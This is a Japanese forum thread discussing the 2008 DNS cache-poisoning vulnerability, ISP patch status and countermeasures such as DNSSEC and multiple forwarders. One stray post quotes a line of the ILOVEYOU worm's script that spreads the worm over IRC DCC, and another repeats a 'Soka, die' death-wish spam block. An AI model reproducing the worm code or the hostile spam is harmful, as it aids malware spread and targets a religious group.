DNSプロトコルの脆弱性情報　漏洩する

管理外再帰の可能なDNSに限って言えば、国内の主要な所は更新されたようだね
大学も殆ど対応済み
CATVも殆ど対応済み

ただOCNの下にぶら下がる地方のプロバイダの更新が遅いね
お知らせコーナーを見ると更新が2007年代で止まってる所もあるし、こう言う所は危ないな

ｲﾝﾀｰﾈｯﾄ終了のお知らせ。
DNSの脆弱性の実証コードがリリースされる。
僅か数分で汚染可能
ttp://news4vip.livedoor.biz/archives/51190869.html

>>100
海外のBIND板だと対抗策も出てるけど、本家＋第三者加工プログラムみたいな感じで導入が難しいな
Windows環境だと今の所完全防御は絶望的

でもさ、ポイズニングって送信元IPアドレスの
詐称ができないとだめなんでしょ？
ISPは出て行くパケットについてのチェックをしてないのかな。

>>102
その出て行くパケってのはサーバと言う意味で書いてるの？契約ユーザーいう意味で書いてるの？

管理者の手元にあるサーバからは改変されたパケなんて出ないからチェックする意味が無い
ユーザーからは改変されたパケが飛ぶかもしれないが、それが何を意味するか分からないのに止めたら大問題だ

都合、チェックをする意味が無い
チェックをしたとしても赤の他人のサーバにそれを信じろと言うのは無理だろ？
だからサーバは入ってくるパケの整合性を調べる努力をするしかない

で
結局被害は無しなのな

>>104
へ？被害でてるじゃん？
ネット系のニュースで一週間以上も前に見たぞ

いくつか出てたうちの一つはアフィリエイト目的のページに数千人単位で誘導するという豪快なんだか小悪党なんだか分からないやつだったけど
あれがウイルスバラマキじゃなかったから大騒ぎになってないだけ

>>105
それって誘導されただけで
被害って程じゃないジャン
振り込め詐欺ぐらいのはないの？

誘導に成功してるって事は、ルール無用の自前サーバで何でも出来るって事と同義だよ
あと、折角丁寧にネット上の足跡を消したのに、振り込め詐欺を行うと口座から何から全部残ってしまうから普通はしない
やるならカードの暗証蛮語を入力させる方式で、全世界の好きな所でお金をおろせる方を選ぶだろうね

因みにアフィリエイトに誘導しただけで、検索場を提供してる側には営業利益的に軽く数百万の被害が出ている
キャッシュをクリアした直後の効率低下も考えれば数字にならない阻害も大きい

勿論アフィリエイトを登録されていた側も詐欺的な手法で出来高払いを行わなければならないので、払っていたら被害金額として、払わなくても詐欺の被害を受けている事になる
エンドポイントである一ユーザーの被害は聞こえてこなくても、既に十分に被害が出てるよ

アフィリエイト提供側に被害って・・・・
誘導してくれてむしろありがとうだろうｗ

アフィリエイトは相手に悪い印象を与えたら商品のイメージが最悪になる
だから日本の普通のアフィリエイトは小さく邪魔せずページの内容に沿った物が表示される事が多い

検索から誘導されて飛んだページにアフィリだけ置いてあって、しかもページが怪しさ満点だったりするとアフィリまで怪しいと思われかねない
誰も飛ばないバナーなのに表示するだけで金が取られるってアフィリの会社からすると最悪だよ

>>109
おまえ、アフィリエイトの仕組み分かってないだろ？
商品の宣伝なんぞのためにアフィはそんざいしているのではないよ

正確には広告主の要望にしたがってサイトを運営してもらうために
金をばら撒いている、というのが本音

「ネットの基幹インフラに重大欠陥　暗証番号盗み見も」
http://www.nikkei.co.jp/news/main/20080822AT2G2100D21082008.html
・・・基幹インフラである「ＤＮＳサーバー」に欠陥が見つかったとして
注意を呼びかけ始めた。・・・

>>111
＞被害事例はまだ報告されていないものの

cache poisoning自体はずいぶん昔から指摘されていた欠陥だしね今さらな感も

DNSの脆弱性問題でISPに被害
http://www.itmedia.co.jp/news/articles/0807/31/news021.html

>>111
と
>>114
の内容は違うんじゃないのか？

>>111 のは"ＤＮＳサーバーに偽の住所情報を大量に送りつけると"ってあたりが一連のDNS Spoofingと違う気がする
>>114 のは例の"ポートが固定されていたら〜"から派生する内容だよね？

>>111 の具体的な方法はどんなものだろう？日経の記事は必要以上に丸められていてわからん

>>115
いやたぶん同じことを言おうとしているんだと思う
日本ネットワークインフォメーションセンターとやらが
この時期別の危険性を声高に叫ぶはずないでしょ

ttp://www.nic.ad.jp/ja/topics/2008/20080822-01.html

いまごろ知ったのか>日経

日経・・・日本のオンライン経済活動に疎いんじゃないのか
何にしてもあの記事の書き方は知識がある人が見ても謎な文章だから、そうじゃない人には尚更だっただろう

もしかしてネットワーク系の会社の株を操作したんじゃあるまいな〜
多分ちょっとは下がってるはずだし、場の雰囲気が悪化したと思うが

今、NHKでこれのニュースが有った。
「専用のプログラムを使用すれば対策出来る」とのこと。
被害例として、金融システムにアクセスしようとしたら、詐欺サイトうんぬん。

煽ってる割には、だからどうすんねん！というニュースでした。

＞「専用のプログラムを使用すれば対策出来る」

なんと便利な解説＞NHK
この言葉，いつでも使えそうだな（笑

これに絡んでエンタープライズウォッチで自社製品の売り込みしてる
おっさんの記事見て思ったんだけど、
自由度40億で破るのに10時間かかるなら、DNSのリクエストを2回送って
二つのレスポンスをクロスチェックするだけで、
自由度が1600京になって安全性を確保できるんじゃね？

そう言うのはBINDの有志が組んだものがあるけど、最初の名前解決に恐ろしい程時間がかかるよ
個人なら耐えられるけど、ISPでは耐えられないかも
あと、複数参照は攻撃された部位が上流の場合は同じ汚染情報を受け取ってしまうのも弱点

個人的にはDNSSECお勧め

問い合わせ二回だから時間が2倍になるってこと？
それ以上というニュアンスで受け取ったけど、なぜだろう・・・？

まずフォワード先は最低3カ所は必要
なぜなら二つではどちらかが汚染されてたとしても同数だから多数決で判断できなくなるから
フォワード先は上流の分かれた奇数カ所が望ましいとされている
日本の場合は外部からの再帰的問い合わせに答えるDNSサーバが80カ所以上あるので、これは何とかなる

フォワード先を増やすと、基本的には全ての解決が終了してからでないと汚染確認が始まらない
フォワード先のDNSサーバが名前解決を失敗したり、回線の都合で立ち消えになったりすると、タイムオーバーまで名前解決が停止する
一度キャッシュされた後は通常と同じ速度で再帰的問い合わせに答えるが、キャッシュ生存時間が過ぎれば再び同じ手順を経る事になる
多数のフォワード先を利用する都合、最も遅いDNSサーバの影響を大きく受ける

自分の上流のDNSサーバ以外を利用する為、今まで5〜10msで解決出来ていたものが20〜40ms掛かるようになり、更に汚染確認の処理が入る為50msを越える事が多くなる

>>124
分からないので教えてほしいのですが、
外部のフォワーダ3台以上使って各応答を検証する特殊な仕組みを作るより、
普通のフルサービスリゾルバ持って自力でルートから素直に辿るほうが
自然そうなんですけれど、それじゃ駄目?

>>125
124じゃないが答えてみる

その方法だと一部のサーバにすげぇ無理が行くし、フルサービスリゾルバって結局は他力本願なキャッシュサーバーだよな
そこに問い合わせる方法が安全でも中身が腐ってたら意味なさそう

あと124も分かってて端折ってるのかも知れんが直接攻撃でキャッシュ書き換えられたらどーしよーもない
多数のフォーワードに聞きに行く方法は自分は攻撃されないだろうという楽観的な対策のひとつに過ぎんよ

やっぱり根元的な対策はDNSSECしかないのでは

根本的な問題として，
IPにおける送信元アドレスの詐称は動揺もないのか？

動揺→どうしよう

技術的には可能だろうけど、主観時間的に不可能だし、予算的に不可能だし、フォーマット的に不可能だと思う

何か全然被害ないねえ
ハッカーどうしたの？

OCNだけどようやくGREATになった

詳細が明かされたDNSキャッシュ・ポイズニングの新手法
ぜい弱性の有無のチェックと対策は計画的かつ確実に

ttp://itpro.nikkeibp.co.jp/article/COLUMN/20080811/312660/

テストできないよね？
https://www.dns-oarc.net/oarc/services/dnsentropy

ん？　できたけど

ちなみにbiglobeだけどすべてGREATですた！

>>126
ごめんなさい、やっぱり分かりません。私が意図してたのは、
・各応答を検証する仕組みは、自宅 or 自サイトで持つサーバで作るのだろう(推測)
・その仕組みから、ヨソ(外部組織)の野良キャッシュサーバを多数使う?
・それなら自宅内で BIND でも何でもいいからあげて、ルート→jp→co.jpと順次辿る、
　ルートサーバとオリジンサーバを信じる普通のやり方でいいのでは。
ということです。
検証のため(?)という理屈で知らない人からの再帰クエリーを送りつけられる、
ヨソのキャッシュサーバたちの方が「一部のサーバにすごい負荷」な状態に
あたるのではないかなと。

「直接攻撃でキャッシュ書き換えられたらどーしよーもない」には同感です。
外部組織からの再帰検索を受けつける甘いサーバより、自宅 BIND の方が信じられそう。

http://support.microsoft.com/kb/956190/
NATの下のプライベートなDNS(Win2003のDC)だけど関係あんの？

「攻撃トラフィック」発信源、ワースト1位は日本 | WIRED VISION
http://wiredvision.jp/news/200809/2008091122.html

>攻撃トラフィックの発信源、すなわち「分散型サービス拒否」(DDoS)攻撃や、
>ハッキング行為、DNS(ドメイン・ネーム・システム)ハイジャックのトラフィ
>ックが特に多かったのは、日本[30.07％。前期の3.56％(7位)から急浮上した]、
>米国[21.52％]、中国[8.90％]、ドイツ [5.56％]だった。

DNS (Domain Name System) 総合
http://pc11.2ch.net/test/read.cgi/network/1159978850/l50

誰か教えて下さい。

うちのサイトをグーグルのキャッシュで表示すると
全然別のドメインでクッキー許可のポーズ画面（プイバシーの警告）が表示されます。
（当サイトではそもそもクッキーは使用していません。）

詳細情報を見ると　searchportal.information・・・何とかかんとかの文字が・・・

「searchportal.information」をグーグルで検索すると

DNSポイズニングsearchportal.information.comがやってきた！ - SEO
http://www.search-seo.info/2008/11/dnssearchportalinformationcom.html

DNSポイズニングってヤバイのでしょうか?
新種のアタッキングでしょうか?　　対処方法はないでしょうか？
そもそも何故グーグルのキャッシュページにプライバシーの警告画面がでるんでしょうか？

誰か教えて下さい。

Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

てｓｔ

とりあえず対策としてルータのDNSフォワードは使わず、OSのDNS設定にDNS Benchmark(GRC)で調べたエラーのなく高速なDNSアドレスを幾つか列記でおｋ？

創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね　
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね　
創,価
死,ね

Ubuntuフォーラムに不正アクセス、ユーザー情報が流出
http://www.itmedia.co.jp/enterprise/articles/1307/22/news077.html

hosyu age

ttp://www.e-ontap.com/blog/20140415.html
ttp://www.e-ontap.com/dns/endofdns.html
ttp://www.e-ontap.com/dns/endofdns2.html

スレ再利用的にageとく

DNSSEC Validation対応しているISPはどのくらいあるんだ？